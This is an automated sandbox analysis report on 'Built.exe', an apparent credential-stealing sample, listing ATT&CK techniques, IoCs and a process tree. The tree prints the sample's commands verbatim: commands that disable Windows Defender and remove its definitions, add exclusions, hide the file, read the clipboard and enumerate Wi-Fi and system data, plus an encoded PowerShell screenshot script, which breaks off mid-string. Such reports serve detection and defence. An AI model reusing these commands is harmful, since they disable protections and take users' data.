3b91d7f0be55606bcdf71b37a18f34c298156b12181ff7c944fb7a1818916736

Analysis

max time kernel
93s
max time network
94s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
07/10/2024, 04:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Built.exe
Size

7.5MB
MD5

f6c1ca73d58bee19392afdf533bac4b3
SHA1

35e4a258a6f3834e7a3164d929b6333ba91ab9d9
SHA256

ea7ff4296f265854109ce36e1cd4e1d4b9afd94fe5d22392421da5b07c9f5e32
SHA512

714fdc94576245696b9c7948cc997a536380e54b5a2b2342321e3ef50ae8d413ab91c71774510defe28245b7e7d6d410905a76922cc3da4305c772a3043a8435
SSDEEP

196608:EjgVVEugwfI9jUC2gYBYv3vbW2+iITx1U6nu:XVVEu/IH2gYBgDWJTnzu

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1564	powershell.exe
464	powershell.exe
4556	powershell.exe
464	powershell.exe
2972	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Built.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
5116	cmd.exe
3560	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4944	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
828	Built.exe
828	Built.exe
828	Built.exe
828	Built.exe
828	Built.exe
828	Built.exe
828	Built.exe
828	Built.exe
828	Built.exe
828	Built.exe
828	Built.exe
828	Built.exe
828	Built.exe
828	Built.exe
828	Built.exe
828	Built.exe
828	Built.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
24	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
3452	tasklist.exe
4928	tasklist.exe
1244	tasklist.exe
312	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
3260	cmd.exe

UPX packed file 58 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral4/files/0x0007000000023475-21.dat	upx
behavioral4/memory/828-25-0x00007FFE86470000-0x00007FFE86B35000-memory.dmp	upx
behavioral4/files/0x0007000000023468-27.dat	upx
behavioral4/files/0x0007000000023473-29.dat	upx
behavioral4/files/0x000700000002346f-47.dat	upx
behavioral4/memory/828-48-0x00007FFE9E370000-0x00007FFE9E37F000-memory.dmp	upx
behavioral4/files/0x000700000002346e-46.dat	upx
behavioral4/files/0x000700000002346d-45.dat	upx
behavioral4/files/0x000700000002346c-44.dat	upx
behavioral4/files/0x000700000002346b-43.dat	upx
behavioral4/files/0x000700000002346a-42.dat	upx
behavioral4/files/0x0007000000023469-41.dat	upx
behavioral4/files/0x0007000000023467-40.dat	upx
behavioral4/files/0x000700000002347a-39.dat	upx
behavioral4/files/0x0007000000023479-38.dat	upx
behavioral4/files/0x0007000000023478-37.dat	upx
behavioral4/files/0x0007000000023474-34.dat	upx
behavioral4/files/0x0007000000023472-33.dat	upx
behavioral4/memory/828-31-0x00007FFE99560000-0x00007FFE99585000-memory.dmp	upx
behavioral4/memory/828-54-0x00007FFE959E0000-0x00007FFE95A0D000-memory.dmp	upx
behavioral4/memory/828-56-0x00007FFE9BA30000-0x00007FFE9BA4A000-memory.dmp	upx
behavioral4/memory/828-58-0x00007FFE957A0000-0x00007FFE957C4000-memory.dmp	upx
behavioral4/memory/828-60-0x00007FFE95280000-0x00007FFE953FF000-memory.dmp	upx
behavioral4/memory/828-66-0x00007FFE95BC0000-0x00007FFE95BF3000-memory.dmp	upx
behavioral4/memory/828-64-0x00007FFE95C00000-0x00007FFE95C0D000-memory.dmp	upx
behavioral4/memory/828-62-0x00007FFE95C10000-0x00007FFE95C29000-memory.dmp	upx
behavioral4/memory/828-74-0x00007FFE85C00000-0x00007FFE86133000-memory.dmp	upx
behavioral4/memory/828-72-0x00007FFE95650000-0x00007FFE9571E000-memory.dmp	upx
behavioral4/memory/828-71-0x00007FFE99560000-0x00007FFE99585000-memory.dmp	upx
behavioral4/memory/828-70-0x00007FFE86470000-0x00007FFE86B35000-memory.dmp	upx
behavioral4/memory/828-76-0x00007FFE95BA0000-0x00007FFE95BB4000-memory.dmp	upx
behavioral4/memory/828-79-0x00007FFE95B90000-0x00007FFE95B9D000-memory.dmp	upx
behavioral4/memory/828-78-0x00007FFE959E0000-0x00007FFE95A0D000-memory.dmp	upx
behavioral4/memory/828-84-0x00007FFE85AE0000-0x00007FFE85BFA000-memory.dmp	upx
behavioral4/memory/828-85-0x00007FFE957A0000-0x00007FFE957C4000-memory.dmp	upx
behavioral4/memory/828-183-0x00007FFE95280000-0x00007FFE953FF000-memory.dmp	upx
behavioral4/memory/828-291-0x00007FFE95BC0000-0x00007FFE95BF3000-memory.dmp	upx
behavioral4/memory/828-306-0x00007FFE95650000-0x00007FFE9571E000-memory.dmp	upx
behavioral4/memory/828-309-0x00007FFE85C00000-0x00007FFE86133000-memory.dmp	upx
behavioral4/memory/828-334-0x00007FFE85AE0000-0x00007FFE85BFA000-memory.dmp	upx
behavioral4/memory/828-326-0x00007FFE95280000-0x00007FFE953FF000-memory.dmp	upx
behavioral4/memory/828-320-0x00007FFE86470000-0x00007FFE86B35000-memory.dmp	upx
behavioral4/memory/828-321-0x00007FFE99560000-0x00007FFE99585000-memory.dmp	upx
behavioral4/memory/828-346-0x00007FFE99560000-0x00007FFE99585000-memory.dmp	upx
behavioral4/memory/828-368-0x00007FFE95BC0000-0x00007FFE95BF3000-memory.dmp	upx
behavioral4/memory/828-369-0x00007FFE95650000-0x00007FFE9571E000-memory.dmp	upx
behavioral4/memory/828-367-0x00007FFE95C00000-0x00007FFE95C0D000-memory.dmp	upx
behavioral4/memory/828-366-0x00007FFE95C10000-0x00007FFE95C29000-memory.dmp	upx
behavioral4/memory/828-365-0x00007FFE95280000-0x00007FFE953FF000-memory.dmp	upx
behavioral4/memory/828-364-0x00007FFE957A0000-0x00007FFE957C4000-memory.dmp	upx
behavioral4/memory/828-363-0x00007FFE9BA30000-0x00007FFE9BA4A000-memory.dmp	upx
behavioral4/memory/828-362-0x00007FFE959E0000-0x00007FFE95A0D000-memory.dmp	upx
behavioral4/memory/828-361-0x00007FFE9E370000-0x00007FFE9E37F000-memory.dmp	upx
behavioral4/memory/828-360-0x00007FFE85C00000-0x00007FFE86133000-memory.dmp	upx
behavioral4/memory/828-345-0x00007FFE86470000-0x00007FFE86B35000-memory.dmp	upx
behavioral4/memory/828-359-0x00007FFE85AE0000-0x00007FFE85BFA000-memory.dmp	upx
behavioral4/memory/828-358-0x00007FFE95B90000-0x00007FFE95B9D000-memory.dmp	upx
behavioral4/memory/828-357-0x00007FFE95BA0000-0x00007FFE95BB4000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4664	cmd.exe
1920	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1308	cmd.exe
2848	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3088	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3528	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1920	PING.EXE

Suspicious behavior: EnumeratesProcesses 24 IoCs

pid	Process
1564	powershell.exe
1564	powershell.exe
4556	powershell.exe
4556	powershell.exe
3560	powershell.exe
3560	powershell.exe
464	powershell.exe
464	powershell.exe
464	powershell.exe
1564	powershell.exe
1564	powershell.exe
4556	powershell.exe
4104	powershell.exe
4104	powershell.exe
3560	powershell.exe
4104	powershell.exe
464	powershell.exe
464	powershell.exe
728	powershell.exe
728	powershell.exe
2972	powershell.exe
2972	powershell.exe
3084	powershell.exe
3084	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3452	tasklist.exe
Token: SeDebugPrivilege	4928	tasklist.exe
Token: SeDebugPrivilege	1564	powershell.exe
Token: SeDebugPrivilege	4556	powershell.exe
Token: SeIncreaseQuotaPrivilege	460	WMIC.exe
Token: SeSecurityPrivilege	460	WMIC.exe
Token: SeTakeOwnershipPrivilege	460	WMIC.exe
Token: SeLoadDriverPrivilege	460	WMIC.exe
Token: SeSystemProfilePrivilege	460	WMIC.exe
Token: SeSystemtimePrivilege	460	WMIC.exe
Token: SeProfSingleProcessPrivilege	460	WMIC.exe
Token: SeIncBasePriorityPrivilege	460	WMIC.exe
Token: SeCreatePagefilePrivilege	460	WMIC.exe
Token: SeBackupPrivilege	460	WMIC.exe
Token: SeRestorePrivilege	460	WMIC.exe
Token: SeShutdownPrivilege	460	WMIC.exe
Token: SeDebugPrivilege	460	WMIC.exe
Token: SeSystemEnvironmentPrivilege	460	WMIC.exe
Token: SeRemoteShutdownPrivilege	460	WMIC.exe
Token: SeUndockPrivilege	460	WMIC.exe
Token: SeManageVolumePrivilege	460	WMIC.exe
Token: 33	460	WMIC.exe
Token: 34	460	WMIC.exe
Token: 35	460	WMIC.exe
Token: 36	460	WMIC.exe
Token: SeDebugPrivilege	1244	tasklist.exe
Token: SeDebugPrivilege	3560	powershell.exe
Token: SeDebugPrivilege	464	powershell.exe
Token: SeIncreaseQuotaPrivilege	460	WMIC.exe
Token: SeSecurityPrivilege	460	WMIC.exe
Token: SeTakeOwnershipPrivilege	460	WMIC.exe
Token: SeLoadDriverPrivilege	460	WMIC.exe
Token: SeSystemProfilePrivilege	460	WMIC.exe
Token: SeSystemtimePrivilege	460	WMIC.exe
Token: SeProfSingleProcessPrivilege	460	WMIC.exe
Token: SeIncBasePriorityPrivilege	460	WMIC.exe
Token: SeCreatePagefilePrivilege	460	WMIC.exe
Token: SeBackupPrivilege	460	WMIC.exe
Token: SeRestorePrivilege	460	WMIC.exe
Token: SeShutdownPrivilege	460	WMIC.exe
Token: SeDebugPrivilege	460	WMIC.exe
Token: SeSystemEnvironmentPrivilege	460	WMIC.exe
Token: SeRemoteShutdownPrivilege	460	WMIC.exe
Token: SeUndockPrivilege	460	WMIC.exe
Token: SeManageVolumePrivilege	460	WMIC.exe
Token: 33	460	WMIC.exe
Token: 34	460	WMIC.exe
Token: 35	460	WMIC.exe
Token: 36	460	WMIC.exe
Token: SeDebugPrivilege	4104	powershell.exe
Token: SeDebugPrivilege	312	tasklist.exe
Token: SeDebugPrivilege	464	powershell.exe
Token: SeDebugPrivilege	728	powershell.exe
Token: SeIncreaseQuotaPrivilege	5080	WMIC.exe
Token: SeSecurityPrivilege	5080	WMIC.exe
Token: SeTakeOwnershipPrivilege	5080	WMIC.exe
Token: SeLoadDriverPrivilege	5080	WMIC.exe
Token: SeSystemProfilePrivilege	5080	WMIC.exe
Token: SeSystemtimePrivilege	5080	WMIC.exe
Token: SeProfSingleProcessPrivilege	5080	WMIC.exe
Token: SeIncBasePriorityPrivilege	5080	WMIC.exe
Token: SeCreatePagefilePrivilege	5080	WMIC.exe
Token: SeBackupPrivilege	5080	WMIC.exe
Token: SeRestorePrivilege	5080	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3632 wrote to memory of 828	3632	Built.exe	82
PID 3632 wrote to memory of 828	3632	Built.exe	82
PID 828 wrote to memory of 3088	828	Built.exe	83
PID 828 wrote to memory of 3088	828	Built.exe	83
PID 828 wrote to memory of 3508	828	Built.exe	84
PID 828 wrote to memory of 3508	828	Built.exe	84
PID 828 wrote to memory of 3260	828	Built.exe	85
PID 828 wrote to memory of 3260	828	Built.exe	85
PID 828 wrote to memory of 2080	828	Built.exe	89
PID 828 wrote to memory of 2080	828	Built.exe	89
PID 828 wrote to memory of 2728	828	Built.exe	91
PID 828 wrote to memory of 2728	828	Built.exe	91
PID 828 wrote to memory of 2624	828	Built.exe	92
PID 828 wrote to memory of 2624	828	Built.exe	92
PID 2624 wrote to memory of 3452	2624	cmd.exe	95
PID 2624 wrote to memory of 3452	2624	cmd.exe	95
PID 2728 wrote to memory of 4928	2728	cmd.exe	96
PID 2728 wrote to memory of 4928	2728	cmd.exe	96
PID 3508 wrote to memory of 4556	3508	cmd.exe	97
PID 3508 wrote to memory of 4556	3508	cmd.exe	97
PID 828 wrote to memory of 4512	828	Built.exe	98
PID 828 wrote to memory of 4512	828	Built.exe	98
PID 3088 wrote to memory of 1564	3088	cmd.exe	99
PID 3088 wrote to memory of 1564	3088	cmd.exe	99
PID 828 wrote to memory of 5116	828	Built.exe	101
PID 828 wrote to memory of 5116	828	Built.exe	101
PID 828 wrote to memory of 3448	828	Built.exe	102
PID 828 wrote to memory of 3448	828	Built.exe	102
PID 828 wrote to memory of 1192	828	Built.exe	104
PID 828 wrote to memory of 1192	828	Built.exe	104
PID 828 wrote to memory of 1308	828	Built.exe	107
PID 828 wrote to memory of 1308	828	Built.exe	107
PID 3260 wrote to memory of 4084	3260	cmd.exe	108
PID 3260 wrote to memory of 4084	3260	cmd.exe	108
PID 828 wrote to memory of 4916	828	Built.exe	109
PID 828 wrote to memory of 4916	828	Built.exe	109
PID 828 wrote to memory of 2788	828	Built.exe	110
PID 828 wrote to memory of 2788	828	Built.exe	110
PID 828 wrote to memory of 1364	828	Built.exe	113
PID 828 wrote to memory of 1364	828	Built.exe	113
PID 4512 wrote to memory of 460	4512	cmd.exe	117
PID 4512 wrote to memory of 460	4512	cmd.exe	117
PID 2080 wrote to memory of 464	2080	cmd.exe	155
PID 2080 wrote to memory of 464	2080	cmd.exe	155
PID 5116 wrote to memory of 3560	5116	cmd.exe	119
PID 5116 wrote to memory of 3560	5116	cmd.exe	119
PID 3448 wrote to memory of 1244	3448	cmd.exe	120
PID 3448 wrote to memory of 1244	3448	cmd.exe	120
PID 1192 wrote to memory of 2280	1192	cmd.exe	121
PID 1192 wrote to memory of 2280	1192	cmd.exe	121
PID 2788 wrote to memory of 1936	2788	cmd.exe	148
PID 2788 wrote to memory of 1936	2788	cmd.exe	148
PID 4916 wrote to memory of 3528	4916	cmd.exe	123
PID 4916 wrote to memory of 3528	4916	cmd.exe	123
PID 1364 wrote to memory of 4104	1364	cmd.exe	124
PID 1364 wrote to memory of 4104	1364	cmd.exe	124
PID 1308 wrote to memory of 2848	1308	cmd.exe	125
PID 1308 wrote to memory of 2848	1308	cmd.exe	125
PID 828 wrote to memory of 4292	828	Built.exe	126
PID 828 wrote to memory of 4292	828	Built.exe	126
PID 828 wrote to memory of 4356	828	Built.exe	128
PID 828 wrote to memory of 4356	828	Built.exe	128
PID 4292 wrote to memory of 4884	4292	cmd.exe	130
PID 4292 wrote to memory of 4884	4292	cmd.exe	130

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4084	attrib.exe
2732	attrib.exe
3680	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Built.exe
"C:\Users\Admin\AppData\Local\Temp\Built.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3632
- C:\Users\Admin\AppData\Local\Temp\Built.exe
  "C:\Users\Admin\AppData\Local\Temp\Built.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3088
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3508
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:3260
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe"
      4⤵
      Views/modifies file attributes
      PID:4084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌‌‏.scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2080
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌‌‏.scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2728
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2624
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4512
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:5116
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3448
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1192
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:1308
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:2848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4916
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:3528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2788
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:1936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAA